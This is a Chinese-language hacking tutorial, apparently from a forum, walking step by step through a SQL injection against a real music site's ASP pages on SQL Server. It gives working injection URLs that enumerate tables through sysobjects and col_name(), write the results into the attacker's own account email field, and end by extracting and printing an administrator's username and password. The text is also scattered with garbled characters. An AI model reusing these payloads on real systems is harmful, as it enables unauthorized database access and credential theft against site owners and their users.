SQL Injection這個話題越來越熱了,很多的論壇和hack站點都或多或少地在談論這個問題�,當然也有很多革命前輩寫了N多的關(guān)于這方面的文章�,所利用的也是許多知名的程序,比如動網(wǎng)�,塵緣雅境�����,而我們也可以拿到免費的程序來看其中的漏洞和數(shù)據(jù)庫的結(jié)構(gòu)�����,從中來達到注入的目的,不過如果是別人自己寫的程序,那么我們就不知道他的源代碼,更不知道他的數(shù)據(jù)庫結(jié)構(gòu)(數(shù)據(jù)表名和其中的字段名),就算有個變量未過濾提交到數(shù)據(jù)庫去,我們也是無從對其下手的����,只能利用通過猜解他的數(shù)據(jù)庫結(jié)構(gòu)來構(gòu)造相應的SQL語句�,那么是不是就到此為止����,能猜到多少是多少呢?沒有做不到的��,只有想不到的,我相信這篇文章對研究SQL Injection朋友來說,應該會有所啟發(fā)。
一���、發(fā)現(xiàn)漏洞,常規(guī)注入
最近幫我們的站增加音樂,雖然本地的電信的音樂資源庫非常豐富�,但是缺少有關(guān)歌手和專輯的資料,所以到網(wǎng)上去閑逛找點有用的圖片和歌手簡介����,通過百度搜索到了一個mp3的音樂超市�����,里面的資料還是比較豐富的,拷貝的同時順手在他的Specialid=1817后面加了一個(單引號)��,我突然眼前一亮:
Microsoft OLE DB PRovider for SQL Server 錯誤 80040e14
字符串 之前有未閉合的引號�����。
/showspecial.asp����,行13
Specialid沒有過濾掉單引號就直接用到SQL語句中去了��,而且是SQL SERVER版本的���,漏洞的可利用性極大���,可不能就此放過這么好的練兵機會�,接著換;(分號)提交進去�,居然頁面正常出來了,說明該變量也沒有過濾掉;號��,到這里�,我們就可以對此進行SQL滲透了,按照常規(guī)的步驟:
1�����、提交http://********/showspecial.asp?Specialid=1817;use master;--
注:--的作用是注釋掉程序中后面的SQL語句��,以防對我們構(gòu)造的語句有影響,比如order by..
出現(xiàn)
Microsoft OLE DB Provider for SQL Server 錯誤 80040e21
多步 OLE DB 操作產(chǎn)生錯誤�。如果可能���,請檢查每個 OLE DB 狀態(tài)值�。沒有工作被完成����。
/showspecial.asp,行13
想在他的數(shù)據(jù)庫里增加一個管理員是不可能了���,我們再換一種方法
2、提交http://********/showspecial.asp?Specialid=1817 and 1<>(select count(id) from [user])
這一句的意思是猜猜看是不是存在一個名為user的表和他里面有沒有id這個字段
一般來說:
如果不存在該表的話�,會出現(xiàn)
Microsoft OLE DB Provider for SQL Server 錯誤 80040e37
對象名 user 無效�����。
/showspecial.asp,行13
不存在該字段的話�,會出現(xiàn)
Microsoft OLE DB Provider for SQL Server 錯誤 80040e14
列名 id 無效��。
/showspecial.asp,行13
注:一般來說�����,第一步是猜一些公共的表���,這里所指的公共表的意思是大多數(shù)的程序員在寫設計數(shù)據(jù)庫結(jié)構(gòu)的時候會用到的常用的表和字段����,比如新聞的news表中的編號字段id,標題字段title��,用戶表user或者user_data中的編號字段id���,用戶名字段username�,當然你也可以在該站點的登陸界面看他的原代碼����,找到用戶名和密碼的表單的name值�,那個也經(jīng)常會是表字段名的真實值���,如<INPUT type=text name=username size=15>
很幸運��,果然存在user表和id字段
3���、通過提交http://********/showspecial.asp?Specialid=1817 and 1<>(select count(username) from [user])
這里的username是根據(jù)登陸框的表單名去猜的�,恰好存在該字段�。于是在該站注冊了一個用戶名為rrrrr的用戶,作為注入的平臺�,得到我的用戶名的id值103534
4���、繼續(xù)猜下去�,這里我還是利用的他程序中的表單名��,提交:
http://********/showspecial.asp?Specialid=1817 and 1<>(select count(email) from [user])
也存在��,好了,到這里���,我們的平臺已經(jīng)搭建好了。
二�����、深入研究�,讓SQL自己招數(shù)據(jù)庫結(jié)構(gòu)
很多時候,我們只能猜到大家比較熟用的表名,如果是非原程序公開下載的,我們很猜到他的真實數(shù)據(jù)庫結(jié)構(gòu)���,有時候猜半天都猜不到,令人很郁悶,那么該如何拿到他的表結(jié)構(gòu)呢�?我們知道SQL SERVER的每一個數(shù)據(jù)庫都會有用戶表和系統(tǒng)表����,根據(jù)SQL SERVER的聯(lián)機幫助描述是系統(tǒng)表sysobjects:在數(shù)據(jù)庫內(nèi)創(chuàng)建的每個對象(約束�、默認值�����、日志�����、規(guī)則、存儲過程等)在表中占一行,那么也就是說當前數(shù)據(jù)庫的表名都會在該表內(nèi)有存在�����,(對象名 admin 無效�����。大家可以看到上面出現(xiàn)的報錯把表名描述成對象)��。
我們要用的是其中的3個,描述如下(詳細的見SQL SERVER的聯(lián)機幫助):
name 數(shù)據(jù)表的名字
xtype 數(shù)據(jù)表的類型 u為用戶表
id 數(shù)據(jù)表的對象標志
status 保留字段�����,用戶表一般都是大于0的
在查詢分析器執(zhí)行以下SQL語句(以我本地的數(shù)據(jù)庫為例子)
select top 1 name from sysobjects where xtype=u and status>0
我們馬上就可以得到該數(shù)據(jù)庫下用戶表的第一個表名gallery
select top 1 id from sysobjects where xtype=u and name=gallery
我們馬上就可以得到該數(shù)據(jù)庫下用戶表的第一個表名gallery的對象標志2099048
select top 1 name from sysobjects where xtype=u and id>2099048
再得到第2個表名gb_data���,這里用到的是id>2099048��,因為對象標志id是根據(jù)由小到大排列的�����。
以此類推���,我們可以得到所有的用戶表的名字了
接下來�����,我們要根據(jù)得到的表名取他的字段名��,這里我們用到的是系統(tǒng)自帶的2個函數(shù)col_name()和object_id()�����,在查詢分析器執(zhí)行以下SQL語句(以我本地的數(shù)據(jù)庫為例子):
select top 1 col_name(object_id(gallery),1) from gallery
得到gallery表的第一個字段名為id。
注:
col_name()的語法
COL_NAME ( table_id , column_id )
參數(shù)
table_id:包含數(shù)據(jù)庫列的表的標識號���。table_id 屬于 int 類型。
column_id:列的標識號�。column_id 參數(shù)屬于 int 類型��。
其中我們用object_id()函數(shù)來得到該表的標識號,1�、2����、3����。。表示該表的第1個���、第2個、第3個�。�。字段的標識號
以此類推得到該表所有的字段名稱
三�����、再次滲透攻擊
經(jīng)過上面2步的熱身,接下來我們該利用建立好的平臺實際操作演練一下了
依然是那個頁�,我們提交
http://******/showspecial.asp?Specialid=1817;update[user] set email=(select top 1 name from sysobjects where xtype=u and status>0) where id=103534;--
服務器返回
ADODB.Recordset 錯誤 800a0cb3
當前記錄集不支持更新���。這可能是提供程序的限制���,也可能是選定鎖定類型的限制�����。
/showspecial.asp,行19
出師不利��,可能該頁記錄集打開方式是只讀����,我們再換一個頁
找到http://******/ShowSinger.asp?Classid=34&SClassid=35的SClassid同樣存在問題,于是提交
http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 name from sysobjects where xtype=u and status>0) where id=103534;--
把第一個數(shù)據(jù)表的名字更新到我的資料的email項里去�����,得到第一個表名為:lmuser
http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 id from sysobjects where xtype=u and name=lmuser) where id=103534;--
得到第一個表lmuser的id標識號為:363148339
http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 name from sysobjects where xtype=u and id>363148339) where id=103534;--
得到第二個表名為:ad��。這里我們利用的是數(shù)據(jù)表的對象標志id是升序排列的特點����,以此類推繼續(xù)取……(由于篇幅問題�,中間省略n步),最后我們得到了所有的表名���,發(fā)現(xiàn)其中有個表admin,哈��,很可能就是管理員的列表了���。
好�,接下來我們就取該表的字段名
http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 col_name(object_id(admin),1) from admin) where id=103534;--
得到第1個字段為:id
http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 col_name(object_id(admin),2) from admin) where id=103534;--
得到第2個字段為:username
http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 col_name(object_id(admin),3) from admin) where id=103534;--
得到第2個字段為:passWord
到此��,管理員列表的3個關(guān)鍵字段已經(jīng)給我們拿到���,接下來要拿用戶名和密碼就比較省力了�,首先拿管理員的id值�,這個比較簡單,我就不再詳細說了。
我們拿到的id值是44
http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 username from admin where id=44) where id=103534;--
將該管理員的用戶名更新到email項 ����,拿到的username為:gscdjmp3
http://******/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 password from admin where id=44) where id=103534;--
將該管理員的密碼更新到email項�����,拿到的password為:XZDC9212CDJ
怎么樣�����,拿到密碼了吧?
四、總結(jié)
在我們對一個不知道原代碼的有SQL Iinjection漏洞的程序進行注入的時候�����,往往很難猜到作者設置的數(shù)據(jù)庫結(jié)構(gòu)�,只能通過編寫程序時的經(jīng)驗來猜幾個比較常用的表和字段,這樣給注入帶來了很多的麻煩��,會因為猜不到結(jié)構(gòu)而放棄��,這時候大家不妨試試這個方法�,或許對你有所幫助�,這里我們通過更新我們的一個注冊用戶的信息來拿到結(jié)果,如果是新聞系統(tǒng)的話����,可以通過更新到某個新聞的title來拿結(jié)果。
最后,值得提出的是,請大家不要拿該方法去惡意攻擊其他的程序,謝謝!
